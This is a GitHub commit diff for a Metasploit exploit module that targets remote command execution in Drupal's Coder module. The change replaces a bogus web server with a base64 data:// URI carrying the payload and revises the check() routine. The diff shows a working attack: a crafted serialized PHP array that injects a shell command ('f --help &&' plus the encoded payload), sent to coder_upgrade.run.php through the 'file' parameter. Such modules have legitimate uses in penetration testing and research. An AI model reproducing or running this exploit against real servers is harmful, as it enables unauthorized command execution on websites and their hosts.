Skip to content

Commit dadafd1

Browse files
mdisecmdisec
committed
Use data:// instead of bogus web server and check() improvements.
1 parent 780e83d commit dadafd1

File tree

1 file changed

+6
-16
lines changed

1 file changed

+6
-16
lines changed

modules/exploits/unix/webapp/drupal_coder_exec.rb

Lines changed: 6 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
77
Rank = ExcellentRanking
88

99
include Msf::Exploit::Remote::HttpClient
10-
include Msf::Exploit::Remote::HttpServer
1110

1211
def initialize(info={})
1312
super(update_info(info,
@@ -27,7 +26,7 @@ def initialize(info={})
2726
'License' => MSF_LICENSE,
2827
'Author' =>
2928
[
30-
'Nicky Bloor', # discovery
29+
'Nicky Bloor <[email protected]>', # discovery
3130
'Mehmet Ince <[email protected]>' # msf module
3231
],
3332
'References' =>
@@ -55,9 +54,7 @@ def initialize(info={})
5554

5655
register_options(
5756
[
58-
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
59-
OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
60-
OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
57+
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
6158
]
6259
)
6360
end
@@ -67,15 +64,14 @@ def check
6764
'method' => 'GET',
6865
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
6966
)
70-
if res && res.code == 200
67+
if res && res.body.include?('file parameter is not setNo path to parameter file')
7168
Exploit::CheckCode::Appears
7269
else
7370
Exploit::CheckCode::Safe
7471
end
7572
end
7673

77-
def on_request_uri(cli, _request)
78-
print_status("Incoming request detected...")
74+
def exploit
7975
p = ''
8076
p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
8177
p << 's:11:"theme_cache";s:16:"theme_cache_test";'
@@ -88,20 +84,14 @@ def on_request_uri(cli, _request)
8884
p << ':"f --help && '
8985
p << payload.encoded
9086
p << ' #";s:4:"name";s:4:"test";}}}'
91-
print_status("Sending payload...")
92-
send_response(cli, p)
93-
end
94-
95-
def exploit
96-
start_service
87+
payload = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"
9788
send_request_cgi(
9889
'method' => 'GET',
9990
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
10091
'encode_params' => false,
10192
'vars_get' => {
102-
'file' => get_uri
93+
'file' => payload
10394
}
10495
)
105-
stop_service
10696
end
10797
end

0 commit comments

Comments
 (0)